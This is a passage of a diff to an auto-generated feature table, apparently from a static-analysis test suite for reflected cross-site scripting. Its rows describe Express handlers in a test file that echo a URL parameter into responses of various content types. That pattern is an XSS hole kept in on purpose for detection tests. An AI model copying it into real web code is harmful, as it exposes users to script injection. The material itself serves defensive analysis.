autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:5:9:11 | res.set | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:5:9:11 | res.set | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:5:9:40 | exceptional return of res.set ... /html') | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:5:9:40 | exceptional return of res.set ... /html') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:5:9:40 | exceptional return of res.set ... /html') | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:5:9:40 | exceptional return of res.set ... /html') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:5:9:40 | exceptional return of res.set ... /html') | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:5:9:40 | res.set ... /html') | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:5:9:40 | res.set ... /html') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:5:9:40 | res.set ... /html') | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:5:9:40 | res.set ... /html') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:5:9:40 | res.set ... /html') | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:9:9:11 | set | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:9:9:11 | set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:9:9:11 | set | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:9:9:11 | set | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:9:9:11 | set | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:13:9:26 | 'Content-Type' | CalleeFlexibleAccessPath | res.set | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:13:9:26 | 'Content-Type' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:13:9:26 | 'Content-Type' | contextFunctionInterfaces | textContentType() | @@ -20344,6 +135542,37 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:29:9:39 | 'text/html' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:29:9:39 | 'text/html' | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:9:29:9:39 | 'text/html' | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:5:10:7 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:5:10:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:5:10:7 | res | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:5:10:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:5:10:7 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:5:10:12 | res.send | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:5:10:12 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:5:10:12 | res.send | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:5:10:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:5:10:12 | res.send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:5:10:37 | exceptional return of res.sen ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:5:10:37 | exceptional return of res.sen ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:5:10:37 | exceptional return of res.sen ... ams.id) | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:5:10:37 | exceptional return of res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:5:10:37 | exceptional return of res.sen ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:5:10:37 | res.sen ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:5:10:37 | res.sen ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:5:10:37 | res.sen ... ams.id) | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:5:10:37 | res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:5:10:37 | res.sen ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:9:10:12 | send | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:9:10:12 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:9:10:12 | send | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:9:10:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:9:10:12 | send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:14:10:20 | "FOO: " | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:14:10:20 | "FOO: " | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:14:10:20 | "FOO: " | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:14:10:20 | "FOO: " | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:14:10:20 | "FOO: " | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:14:10:20 | "FOO: " | stringConcatenatedWith | -endpoint- req.params.id | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | contextFunctionInterfaces | textContentType() | @@ -20352,6 +135581,47 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:24:10:26 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:24:10:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:24:10:26 | req | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:24:10:26 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:24:10:26 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:24:10:33 | req.params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:24:10:33 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:24:10:33 | req.params | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:24:10:33 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:24:10:33 | req.params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | stringConcatenatedWith | 'FOO: ' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:28:10:33 | params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:28:10:33 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:28:10:33 | params | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:28:10:33 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:28:10:33 | params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:35:10:36 | id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:35:10:36 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:35:10:36 | id | enclosingFunctionBody | req res whatever res set Content-Type text/plain res send FOO: req params id res set Content-Type text/html res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:35:10:36 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:10:35:10:36 | id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:1:14:3 | app | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:1:14:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:1:14:3 | app | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:1:14:7 | app.get | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:1:14:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:1:14:7 | app.get | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:1:22:2 | app.get ... \\n }\\n}) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:1:22:2 | app.get ... \\n }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:1:22:2 | app.get ... \\n }\\n}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:1:22:2 | exceptional return of app.get ... \\n }\\n}) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:1:22:2 | exceptional return of app.get ... \\n }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:1:22:2 | exceptional return of app.get ... \\n }\\n}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:5:14:7 | get | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:5:14:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:5:14:7 | get | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:9:14:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:9:14:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:9:14:19 | '/user/:id' | calleeImports | express | @@ -20359,6 +135629,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:9:14:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:9:14:19 | '/user/:id' | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:9:14:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:14:21 | this | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:14:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:14:21 | this | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:14:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:14:21 | this | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:22:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:22:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:22:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:22:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:22:1 | 'arguments' object of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:22:1 | exceptional return of anonymous function | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:22:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:22:1 | exceptional return of anonymous function | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:22:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:22:1 | exceptional return of anonymous function | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:22:1 | functio ... .\\n }\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:22:1 | functio ... .\\n }\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:22:1 | functio ... .\\n }\\n} | calleeImports | express | @@ -20366,6 +135651,61 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:22:1 | functio ... .\\n }\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:22:1 | functio ... .\\n }\\n} | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:22:1 | functio ... .\\n }\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:22:1 | return of anonymous function | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:22:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:22:1 | return of anonymous function | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:22:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:22:22:1 | return of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:32:14:34 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:32:14:34 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:32:14:34 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:32:14:34 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:32:14:34 | req | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:32:14:34 | req | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:32:14:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:32:14:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:32:14:34 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:32:14:34 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:37:14:39 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:37:14:39 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:37:14:39 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:37:14:39 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:37:14:39 | res | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:37:14:39 | res | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:37:14:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:37:14:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:37:14:39 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:14:37:14:39 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:15:7:15:14 | whatever | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:15:7:15:14 | whatever | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:15:7:15:14 | whatever | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:15:7:15:14 | whatever | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:15:7:15:14 | whatever | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:5:16:7 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:5:16:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:5:16:7 | res | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:5:16:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:5:16:7 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:5:16:17 | res.writeHead | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:5:16:17 | res.writeHead | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:5:16:17 | res.writeHead | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:5:16:17 | res.writeHead | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:5:16:17 | res.writeHead | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:5:16:60 | exceptional return of res.wri ... json'}) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:5:16:60 | exceptional return of res.wri ... json'}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:5:16:60 | exceptional return of res.wri ... json'}) | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:5:16:60 | exceptional return of res.wri ... json'}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:5:16:60 | exceptional return of res.wri ... json'}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:5:16:60 | res.wri ... json'}) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:5:16:60 | res.wri ... json'}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:5:16:60 | res.wri ... json'}) | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:5:16:60 | res.wri ... json'}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:5:16:60 | res.wri ... json'}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:9:16:17 | writeHead | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:9:16:17 | writeHead | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:9:16:17 | writeHead | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:9:16:17 | writeHead | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:9:16:17 | writeHead | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:19:16:21 | 200 | CalleeFlexibleAccessPath | res.writeHead | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:19:16:21 | 200 | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:19:16:21 | 200 | contextFunctionInterfaces | textContentType() | @@ -20382,6 +135722,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:24:16:59 | {'Conte ... /json'} | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:24:16:59 | {'Conte ... /json'} | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:24:16:59 | {'Conte ... /json'} | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:25:16:38 | 'Content-Type' | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:25:16:38 | 'Content-Type' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:25:16:38 | 'Content-Type' | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:25:16:38 | 'Content-Type' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:25:16:38 | 'Content-Type' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:25:16:58 | 'Conten ... n/json' | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:25:16:58 | 'Conten ... n/json' | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:25:16:58 | 'Conten ... n/json' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:25:16:58 | 'Conten ... n/json' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:25:16:58 | 'Conten ... n/json' | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:25:16:58 | 'Conten ... n/json' | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:25:16:58 | 'Conten ... n/json' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:25:16:58 | 'Conten ... n/json' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:25:16:58 | 'Conten ... n/json' | fileImports | express | +| 